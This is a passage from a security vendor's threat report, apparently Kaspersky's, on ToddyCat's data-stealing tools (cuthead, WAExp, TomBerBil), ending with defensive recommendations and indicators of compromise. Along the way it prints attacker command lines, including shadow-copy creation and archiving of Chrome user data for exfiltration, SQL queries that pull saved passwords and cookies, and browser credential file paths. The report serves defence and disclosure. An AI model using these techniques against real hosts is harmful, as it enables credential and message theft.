  1218. <li><strong>Keywords</strong>: a string without spaces that contains semicolon-delimited words to look for in file names</li>
  1219. </ul>
  1220. <p>Here is an example of a <strong>cuthead</strong> launch command.</p><pre class="crayon-plain-tag">"c:\intel\fkw.exe" 20230626 pdf;doc;docx;xls;xlsx</pre><p>
  1221. In this case, the attackers collected all MS Excel, MS Word and PDF files modified after June 26, 2023.</p>
  1222. <p>Once launched, the tool processes the command-line parameters and begins a recursive search for files in the file system on all available drives (<strong><a href="https://attack.mitre.org/techniques/T1005/" target="_blank" rel="noopener">T1005 Data from Local System</a></strong>). Folders that contain the following substrings are excluded from the search.</p><pre class="crayon-plain-tag">$
  1223. Windows
  1224. Program Files
  1225. Programdata
  1226. Application Data
  1227. Program Files (x86)
  1228. Documents and Settings</pre><p>
  1229. Also, the files are excluded from the search if they meet the following criteria:</p>
  1230. <ul>
  1231. <li>The file size is greater than 50 Mb (52428800 bytes).</li>
  1232. <li>The file extensions do not match those specified in the command-line parameters.</li>
  1233. <li>The names do not contain the keywords specified in the command-line parameters.</li>
  1234. </ul>
  1235. <p>A list of files found by the search is passed to the function that creates ZIP archives with the password &#8220;Unsafe404&#8221;. In different versions of the tool, this function has different names but the same purpose. The open-source tool <a href="https://github.com/icsharpcode/SharpZipLib" target="_blank" rel="noopener">icsharpcode/SharpZipLib</a> v. 0.85.4.369 is used for creating archives (<strong><a href="https://attack.mitre.org/techniques/T1560/002/" target="_blank" rel="noopener">T1560.002 Archive Collected Data: Archive via Library</a></strong>).</p>
  1236. <p>Several later variants of cuthead were found with all required options – a list of file extensions and a last modified date that was typically within the previous 7 days – hardcoded within the software. We believe this was done to automate the collection process.</p>
  1237. <h3 id="waexp-whatsapp-data-stealer">WAExp: WhatsApp data stealer</h3>
  1238. <p>This tool is written in .NET and designed to search for and collect browser local storage files containing data from the web version of WhatsApp (web.whatsapp.com). For users of the WhatsApp web app, their browser local storage contains their profile details, chat data, the phone numbers of users they chat with and current session data. Attackers can gain access to this data by copying the browser&#8217;s local storage files.</p>
  1239. <p>The executable accepts the following arguments.</p><pre class="crayon-plain-tag">app.exe [check|copy|start] [remote]</pre><p>
  1240. <strong>Check</strong>: checks the presence of data on the host.<br />
  1241. <strong>Copy</strong>: copies data it finds to the temporary folder.<br />
  1242. <strong>Start:</strong> first, copies the data to the temporary folder and then, packs the data into an archive file.<br />
  1243. <strong>Remote</strong>: the name of the remote host.</p>
  1244. <p>When executed with &#8220;<strong>check</strong>&#8220;, the tool begins searching for user folders. If &#8220;<strong>remote</strong>&#8221; is specified, user folders are searched along &#8220;<strong>\\[remote]\C$\users\</strong>&#8220;. If it is not specified, the malware uses the environment variable <strong>%SystemDrive%</strong> value, retrieving the name of the system drive from it. It then searches inside the Users folder on that drive. Next, the tool goes through all folders in this directory except the following default ones.</p><pre class="crayon-plain-tag">All Users
  1245. Default User
  1246. Default
  1247. Public</pre><p>
  1248. After it locates the user folders, WAExp seeks out file paths for WhatsApp database files in the Chrome, Edge, and Mozilla local storages.</p>
  1249. <p>ForChrome, the tool opens <strong>&lt;User&gt;\Appdata\local\Google\</strong> and for Edge, <strong>&lt;User&gt;\Appdata\local\Microsoft\Edge\</strong>. Inside these, it looks for a folder with the following name inside the subfolders.</p><pre class="crayon-plain-tag">https_web.whatsapp.com_0.indexeddb.leveldb</pre><p>
  1250. For Mozilla, the tool opens<strong>&lt;User&gt;\Appdata\roaming\</strong> and looks for a folder with the following name inside the subfolders:</p><pre class="crayon-plain-tag">https+++web.whatsapp.com</pre><p>
  1251. Roaming may contain several Mozilla folders with web.whatsapp.com storage data. For example,Mozilla Thunderbird can store this data too, as it supports a WhatsApp plugin.</p>
  1252. <div id="attachment_112452" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160252/ToddyCat_data_collection_and_tunneling_06.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112452" class="size-large wp-image-112452" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160252/ToddyCat_data_collection_and_tunneling_06-1024x262.png" width="1024" height="262" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160252/ToddyCat_data_collection_and_tunneling_06-1024x262.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160252/ToddyCat_data_collection_and_tunneling_06-300x77.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160252/ToddyCat_data_collection_and_tunneling_06-768x196.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160252/ToddyCat_data_collection_and_tunneling_06-740x189.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160252/ToddyCat_data_collection_and_tunneling_06-1096x280.png 1096w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160252/ToddyCat_data_collection_and_tunneling_06-800x204.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160252/ToddyCat_data_collection_and_tunneling_06.png 1131w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112452" class="wp-caption-text">WAExp &#8220;check&#8221; output with results for Chrome, Edge, Firefox and Thunderbird</p></div>
  1253. <p>In the image above, you can see the output of the tool running with the &#8220;<strong>check</strong>&#8221; parameter. It shows storage files for <strong>Chrome</strong>, <strong>Edge</strong> and <strong>Firefox</strong>, as well as the <strong>Thunderbird</strong> mail client detected on the host.</p>
  1254. <p>When executed with the &#8220;<strong>copy</strong>&#8221; parameter, WAExp copies all whatsapp.com data storage files in the system to the following temporary storage folder.</p><pre class="crayon-plain-tag">C:\Programdata\Microsoft\Default\</pre><p>
  1255. The last parameter that the tool uses is <strong>&#8220;start&#8221;</strong>. It gathers target files inside a temporary folder, as described in the <strong>copy</strong> function, and packs these into an archive with the help of the <strong>System.IO.Compression.ZipFile</strong> module (<strong><a href="https://attack.mitre.org/techniques/T1560/002/" target="_blank" rel="noopener">T1560.002 Archive Collected Data: Archive via Library</a></strong>).</p>
  1256. <p>It saves the archive file under a name consisting of the word &#8216;Default&#8217; and a timestamp, without extension, at the following path:</p><pre class="crayon-plain-tag">C:\Programdata\Microsoft\Default-yyyyMMdd-hhmmss</pre><p>
  1257. After that, it deletes the temporary folder, along with the web browsers&#8217; and other clients&#8217; folders containing <strong>web.whatsapp.com</strong> data.</p>
  1258. <p>The image below shows an example of WAExp output when run with the various startup parameters.</p>
  1259. <div id="attachment_112453" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160441/ToddyCat_data_collection_and_tunneling_07.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112453" class="size-large wp-image-112453" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160441/ToddyCat_data_collection_and_tunneling_07-1024x510.png" alt="WAExp output for its various command-line parameters" width="1024" height="510" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160441/ToddyCat_data_collection_and_tunneling_07-1024x510.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160441/ToddyCat_data_collection_and_tunneling_07-300x149.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160441/ToddyCat_data_collection_and_tunneling_07-768x382.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160441/ToddyCat_data_collection_and_tunneling_07-703x350.png 703w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160441/ToddyCat_data_collection_and_tunneling_07-740x368.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160441/ToddyCat_data_collection_and_tunneling_07-563x280.png 563w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160441/ToddyCat_data_collection_and_tunneling_07-800x398.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160441/ToddyCat_data_collection_and_tunneling_07.png 1069w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112453" class="wp-caption-text">WAExp output for its various command-line parameters</p></div>
  1260. <p>The operations shown above collect <strong>Chrome</strong> data and generate an archive, whose contents are shown below.</p>
  1261. <div id="attachment_112454" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160515/ToddyCat_data_collection_and_tunneling_08.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112454" class="size-large wp-image-112454" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160515/ToddyCat_data_collection_and_tunneling_08-1024x398.png" alt="Archive file containing data stolen by WAExp" width="1024" height="398" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160515/ToddyCat_data_collection_and_tunneling_08-1024x398.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160515/ToddyCat_data_collection_and_tunneling_08-300x117.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160515/ToddyCat_data_collection_and_tunneling_08-768x299.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160515/ToddyCat_data_collection_and_tunneling_08-900x350.png 900w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160515/ToddyCat_data_collection_and_tunneling_08-740x288.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160515/ToddyCat_data_collection_and_tunneling_08-720x280.png 720w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160515/ToddyCat_data_collection_and_tunneling_08-800x311.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160515/ToddyCat_data_collection_and_tunneling_08.png 1046w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112454" class="wp-caption-text">Archive file containing data stolen by WAExp</p></div>
  1262. <h3 id="tomberbil-for-stealing-passwords-from-browsers">TomBerBil for stealing passwords from browsers</h3>
  1263. <p>In addition to the data that attackers can collect from hosts, they are also interested in obtaining access to all online services that target users have access to. For an adversary with high privileges in the system, one fairly easy way to do this is to decrypt browser data containing cookies and passwords that the user may have saved to autofill authentication forms (<strong><a href="https://attack.mitre.org/techniques/T1555/003/" target="_blank" rel="noopener">T1555.003 Credentials from Password Stores: Credentials from Web Browsers</a></strong>).</p>
  1264. <p>There are many open-source tools available for decrypting storage data, one of these being <a href="https://github.com/gentilkiwi/mimikatz/wiki/module-~-dpapi" target="_blank" rel="noopener"><strong>mimikatz</strong></a>. The problem for the adversary is that these are well known to security systems and will immediately raise red flags if detected in the infrastructure.</p>
  1265. <p>To avoid detection, attackers have created a range of tools implemented with different technologies and designed for the same purpose: to extract cookies and passwords from <strong>Chrome </strong>and <strong>Edge</strong>. Both browsers use the <a href="https://learn.microsoft.com/en-us/windows/win32/api/dpapi/nf-dpapi-cryptprotectdata" target="_blank" rel="noopener"><strong>CryptProtectData</strong></a> feature from <strong>DPAPI </strong>(Data Protection Application Programming Interface) to encrypt data. It protects data with the current user&#8217;s password and a special encryption master key.</p>
  1266. <p>All <strong>TomBerBil </strong>variants work according to the same principle. After starting, the malware begins to enumerate all processes running in the system and search for all instances of <strong>explorer.exe</strong>. It identifies the process users and compiles a list.</p>
  1267. <div id="attachment_112455" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160601/ToddyCat_data_collection_and_tunneling_09.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112455" class="size-large wp-image-112455" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160601/ToddyCat_data_collection_and_tunneling_09-1024x302.png" alt="Username identification function" width="1024" height="302" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160601/ToddyCat_data_collection_and_tunneling_09-1024x302.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160601/ToddyCat_data_collection_and_tunneling_09-300x88.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160601/ToddyCat_data_collection_and_tunneling_09-768x227.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160601/ToddyCat_data_collection_and_tunneling_09-740x218.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160601/ToddyCat_data_collection_and_tunneling_09-949x280.png 949w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160601/ToddyCat_data_collection_and_tunneling_09-800x236.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160601/ToddyCat_data_collection_and_tunneling_09.png 1095w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112455" class="wp-caption-text">Username identification function</p></div>
  1268. <p>The image above shows an example of the function that identifies users by process ID. It sends a <strong>WMI </strong>request to the <strong>Win32_Process </strong>class to receive an object whose <strong>processID property </strong>equals the given PID. It then calls the <strong>GetOwner </strong>method, which returns the user and domain name for the process.</p>
  1269. <p>After this, the malware searches for the encryption key, stored in the <strong>encrypted_key </strong>field in the following browser <strong>JSON </strong>files.</p><pre class="crayon-plain-tag">%LOCALAPPDATA%\Google\Chrome\User Data\Local State
  1270. %LOCALAPPDATA%\Microsoft\Edge\User Data\Local State</pre><p>
  1271. It then impersonates the users it identified and attempts to decrypt the master key using the <strong>CryptUnprotectData</strong> function. To do this, it calls <strong>Unprotect</strong> function from the <strong>System.Security.Cryptography.ProtectedData</strong> package, which, in turn, uses <strong>CryptUnprotectData </strong>function call from Windows DPAPI.</p>
  1272. <div id="attachment_112456" style="width: 622px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160713/ToddyCat_data_collection_and_tunneling_10.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112456" class="size-full wp-image-112456" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160713/ToddyCat_data_collection_and_tunneling_10.png" alt="Calling the Unprotect function" width="612" height="76" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160713/ToddyCat_data_collection_and_tunneling_10.png 612w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160713/ToddyCat_data_collection_and_tunneling_10-300x37.png 300w" sizes="(max-width: 612px) 100vw, 612px" /></a><p id="caption-attachment-112456" class="wp-caption-text">Calling the Unprotect function</p></div>
  1273. <p>The image above shows an example of the <strong>Unprotect</strong> function call, which receives an array of bytes obtained from the <strong>encrypted_key</strong> field. The value of <strong>DataProtectionScope.CurrentUser</strong> is passed as the third parameter. This means that the user context of the calling process will be used when decrypting the data. The tool impersonates the users it finds in explorer.exe for this very purpose.</p>
  1274. <p>If the decryption is successful, the malware searches for <strong>Login Data</strong> and <strong>\Network\Cookies</strong> files inside the following folders.</p><pre class="crayon-plain-tag">%LOCALAPPDATA%\Google\Chrome\User Data\Default
  1275. %LOCALAPPDATA%\Google\Chrome\User Data\Profile *</pre><p>
  1276. It copies any files it finds to the temporary folder, where it opens them as SQL database files and runs the following queries.</p><pre class="crayon-plain-tag">SELECT origin_url, username_value, password_value FROM logins
  1277. SELECT cast(creation_utc as text) as creation_utc, host_key, name, path, cast(expires_utc as text) as
  1278. expires_utc, cast(last_access_utc as text) as last_access_utc, encrypted_value FROM cookies</pre><p>
  1279. Data retrieved this way is decrypted with the master key and saved in special files.</p>
  1280. <p>Most versions of the malware tool log their actions. Below is an example of a log file that they generate:</p><pre class="crayon-plain-tag">[+] Begin 7/28/2023 1:12:37 PM
  1281. [+] Current user SYSTEM
  1282. [*] [5516] [explorer] [UserName]
  1283. [+] Impersonate user UserName
  1284. [+] Current user UserName
  1285. [+] Local State File: C:\Users\UserName\AppData\Local\Google\Chrome\User Data\Local State
  1286. [+] MasterKeyBytes: 6j&lt;...&gt;k=
  1287. [&gt;] Profile: C:\Users\UserName\AppData\Local\Google\Chrome\User Data\Default
  1288. [+] Copy C:\Users\UserName\AppData\Local\Google\Chrome\User Data\Default\Login Data to C:\Windows\TEMP\tmpF319.tmp
  1289. [+] Delete File C:\Windows\TEMP\tmpF319.tmp
  1290. [+] Copy C:\Users\UserName\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies to C:\Windows\TEMP\tmpFA1F.tmp
  1291. [+] Delete File C:\Windows\TEMP\tmpFA1F.tmp
  1292. [+] Local State File: C:\Users\UserName\AppData\Local\Microsoft\Edge\User Data\Local State
  1293. [+] MasterKeyBytes: fv&lt;...&gt;GM=
  1294. [&gt;] Profile: C:\Users\UserName\AppData\Local\Microsoft\Edge\User Data\Default
  1295. [+] Copy C:\Users\UserName\AppData\Local\Microsoft\Edge\User Data\Default\Login Data to C:\Windows\TEMP\tmpFCB0.tmp
  1296. [+] Delete File C:\Windows\TEMP\tmpFCB0.tmp
  1297. [+] Copy C:\Users\UserName\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies to C:\Windows\TEMP\tmpFD5D.tmp
  1298. [+] Delete File C:\Windows\TEMP\tmpFD5D.tmp
  1299. [+] Recvtoself
  1300. [+] Current user SYSTEM
  1301. [+] End 7/28/2023 1:12:52 PM</pre><p>
  1302. One of the variants mimics <strong>Kaspersky Anti-Virus. </strong>This executable, written in .NET, is named <strong>avpui.exe</strong> (<strong><a href="https://attack.mitre.org/techniques/T1036/005/" target="_blank" rel="noopener">T1036.005 Masquerading: Match Legitimate Name or Location</a></strong>) and contains relevant metadata:</p>
  1303. <div id="attachment_112457" style="width: 777px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160939/ToddyCat_data_collection_and_tunneling_11.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112457" class="size-full wp-image-112457" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160939/ToddyCat_data_collection_and_tunneling_11.png" alt="Metadata of the tool pretending to be KAV" width="767" height="268" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160939/ToddyCat_data_collection_and_tunneling_11.png 767w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160939/ToddyCat_data_collection_and_tunneling_11-300x105.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160939/ToddyCat_data_collection_and_tunneling_11-740x259.png 740w" sizes="(max-width: 767px) 100vw, 767px" /></a><p id="caption-attachment-112457" class="wp-caption-text">Metadata of the tool pretending to be KAV</p></div>
  1304. <p>Some versions of the tool required specific command-line parameters to start. An example can be seen below:</p>
  1305. <div id="attachment_112458" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19161007/ToddyCat_data_collection_and_tunneling_12.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112458" class="size-large wp-image-112458" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19161007/ToddyCat_data_collection_and_tunneling_12-1024x187.png" alt="A TomBerBil variant started with a parameter" width="1024" height="187" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19161007/ToddyCat_data_collection_and_tunneling_12-1024x187.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19161007/ToddyCat_data_collection_and_tunneling_12-300x55.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19161007/ToddyCat_data_collection_and_tunneling_12-768x140.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19161007/ToddyCat_data_collection_and_tunneling_12-740x135.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19161007/ToddyCat_data_collection_and_tunneling_12-800x146.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19161007/ToddyCat_data_collection_and_tunneling_12.png 1076w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112458" class="wp-caption-text">A TomBerBil variant started with a parameter</p></div>
  1306. <p>In several cases, beside using TomBerBil, the adversary created a shadow copy of the disk and archived the <strong>User Data</strong> file with <a href="https://www.7-zip.org/" target="_blank" rel="noopener">7zip</a> for the further exfiltration.</p><pre class="crayon-plain-tag">wmic shadowcopy call create Volume='C:\'
  1307. "cmd" /c c:\Intel\7z6.exe a c:\Intel\1.7z -mx0 -r
  1308. \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Users\&lt;username&gt;\AppData\Local\Google\
  1309. Chrome\"User Data\"</pre><p>
  1310. <h2 id="conclusion">Conclusion</h2>
  1311. <p>We looked at several tools that allow the attackers to maintain access to target infrastructures and automatically search for and collect data of interest. The attackers are actively using techniques to bypass defenses in an attempt to mask their presence in the system.</p>
  1312. <p>To protect the organization&#8217;s infrastructure, we recommend adding to the firewall denylist the resources and IP addresses of cloud services that provide traffic tunneling. We also recommend limiting the range of tools administrators are allowed to use for accessing hosts remotely. Unused tools must be either forbidden or thoroughly monitored as a possible indicator of suspicious activity. In addition, users must be required to avoid storing passwords in their browsers, as it helps attackers to access sensitive information. Reusing passwords across different services poses a risk of more data becoming available to attackers.</p>
  1313. <h2 id="indicators-of-compromise">Indicators of compromise</h2>
  1314. <p><strong>Files</strong></p>
  1315. <table width="100%">
  1316. <tbody>
  1317. <tr>
  1318. <td width="60%"><a href="https://opentip.kaspersky.com/1D2B32910B500368EF0933CDC43FDE0B/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">1D2B32910B500368EF0933CDC43FDE0B</a></td>
  1319. <td width="40%">WAExp</td>
  1320. </tr>
  1321. <tr>
  1322. <td><a href="https://opentip.kaspersky.com/5C2870F18E64A14A64ABF9A56F5B6E6B/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">5C2870F18E64A14A64ABF9A56F5B6E6B</a></td>
  1323. <td>WAExp</td>
  1324. </tr>
  1325. <tr>
  1326. <td><a href="https://opentip.kaspersky.com/AFEA0827779025C92CAB86F685D6429A/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">AFEA0827779025C92CAB86F685D6429A</a></td>
  1327. <td>cuthead</td>
  1328. </tr>
  1329. <tr>
  1330. <td><a href="https://opentip.kaspersky.com/AFEA0827779025C92CAB86F685D6429A/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">C7D8266C63F8AECA8D5F5BDCD433E72A</a></td>
  1331. <td>cuthead</td>
  1332. </tr>
  1333. <tr>
  1334. <td><a href="https://opentip.kaspersky.com/750EF49AFB88DDD52F6B0C500BE9B717/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">750EF49AFB88DDD52F6B0C500BE9B717</a></td>
  1335. <td>TomBerBil</td>
  1336. </tr>
  1337. <tr>
  1338. <td><a href="https://opentip.kaspersky.com/853A75364D76E9726474335BCD17E225/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">853A75364D76E9726474335BCD17E225</a></td>
  1339. <td>TomBerBil</td>
  1340. </tr>
  1341. <tr>
  1342. <td><a href="https://opentip.kaspersky.com/BA3EF3D0947031FB9FFBC2401BA82D79/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">BA3EF3D0947031FB9FFBC2401BA82D79</a></td>
  1343. <td>Krong</td>
  1344. </tr>
  1345. </tbody>
  1346. </table>
  1347. <p><strong>legitimate tools</strong></p>
  1348. <table width="100%">
  1349. <tbody>
  1350. <tr>
  1351. <td width="60%"><a href="https://opentip.kaspersky.com/4A79A8B1F6978862ECFA71B55066AADD/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">4A79A8B1F6978862ECFA71B55066AADD</a></td>
  1352. <td width="40%">FRP client</td>
  1353. </tr>
  1354. <tr>
  1355. <td><a href="https://opentip.kaspersky.com/1F514121162865A9E664C919E71A6F62/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">1F514121162865A9E664C919E71A6F62</a></td>
  1356. <td>vpnserver_x64.exe</td>
  1357. </tr>
  1358. <tr>
  1359. <td><a href="https://opentip.kaspersky.com/6F32D6CFAAD3A956AACEA4C5A5C4FBFE/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">6F32D6CFAAD3A956AACEA4C5A5C4FBFE</a></td>
  1360. <td>vpnserver_x64.exe</td>
  1361. </tr>
  1362. <tr>
  1363. <td><a href="https://opentip.kaspersky.com/9DC7237AC63D552270C5CA27960168C3/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">9DC7237AC63D552270C5CA27960168C3</a></td>
  1364. <td>ngrok.exe</td>
  1365. </tr>
  1366. <tr>
  1367. <td><a href="https://opentip.kaspersky.com/34985FAE5FA8E9EBAA872DE8D0105005/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">34985FAE5FA8E9EBAA872DE8D0105005</a></td>
  1368. <td>ngrok.exe</td>
  1369. </tr>
  1370. </tbody>
  1371. </table>
  1372. <p><strong>C2 addresses</strong></p>
  1373. <table width="100%">
  1374. <tbody>
  1375. <tr>
  1376. <td width="40%"><a href="https://opentip.kaspersky.com/103.27.202.85/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">103.27.202[.]85</a></td>
  1377. <td width="60%">&#8211; SSH server</td>
  1378. </tr>
  1379. <tr>
  1380. <td><a href="https://opentip.kaspersky.com/118.193.40.42/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">118.193.40[.]42</a></td>
  1381. <td>&#8211; Server from SoftEther VPN</td>
  1382. </tr>
  1383. <tr>
  1384. <td><a href="https://opentip.kaspersky.com/Ha.bbmouseme.com/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">Ha[.]bbmouseme[.]com</a></td>
  1385. <td>&#8211; Server from SoftEther VPN</td>
  1386. </tr>
  1387. </tbody>
  1388. </table>
  1389. <p><strong>Links</strong></p>
  1390. <table width="100%">
  1391. <tbody>
  1392. <tr>
  1393. <td width="75%"><a href="https://opentip.kaspersky.com/http%3A%2F%2Fwww.netportal.or.kr%2Fcommon%2Fcss%2Fmain.js/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxp://www.netportal.or[.]kr/common/css/main.js</a></td>
  1394. <td width="25%">vpnserver_x64.exe</td>
  1395. </tr>
  1396. <tr>
  1397. <td><a href="https://opentip.kaspersky.com/http%3A%2F%2Fwww.netportal.or.kr%2Fcommon%2Fcss%2Fham.js/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxp://www.netportal.or[.]kr/common/css/ham.js</a></td>
  1398. <td>Hamcore.se2</td>
  1399. </tr>
  1400. <tr>
  1401. <td><a href="https://opentip.kaspersky.com/http%3A%2F%2F23.106.122.5%2Fhamcore.se2/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxp://23.106.122[.]5/hamcore.se2</a></td>
  1402. <td>Hamcore.se2</td>
  1403. </tr>
  1404. <tr>
  1405. <td><a href="https://opentip.kaspersky.com/https%3A%2F%2Fetracking.nso.go.th%2FUserFiles%2FFile%2F111%2Ftasklist.exe/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://etracking.nso.go[.]th/UserFiles/File/111/tasklist.exe</a></td>
  1406. <td>vpnserver_x64.exe</td>
  1407. </tr>
  1408. <tr>
  1409. <td><a href="https://opentip.kaspersky.com/https%3A%2F%2Fetracking.nso.go.th%2FUserFiles%2FFile%2F111%2Fhamcore.se2/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://etracking.nso.go[.]th/UserFiles/File/111/hamcore.se2</a></td>
  1410. <td>Hamcore.se2</td>
  1411. </tr>
  1412. </tbody>
  1413. </table>
  1414. ]]></content:encoded>
  1416. <wfw:commentRss>https://securelist.com/toddycat-traffic-tunneling-data-extraction-tools/112443/feed/</wfw:commentRss>
  1417. <slash:comments>2</slash:comments>
  1420. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/22071148/sl_toddy_cat_palm_civet_in_a_digital_tube_photoreal.jpg" width="1376" height="864"><media:keywords>full</media:keywords></media:content>
  1421. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/22071148/sl_toddy_cat_palm_civet_in_a_digital_tube_photoreal-1024x643.jpg" width="1024" height="643"><media:keywords>large</media:keywords></media:content>
  1422. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/22071148/sl_toddy_cat_palm_civet_in_a_digital_tube_photoreal-300x188.jpg" width="300" height="188"><media:keywords>medium</media:keywords></media:content>
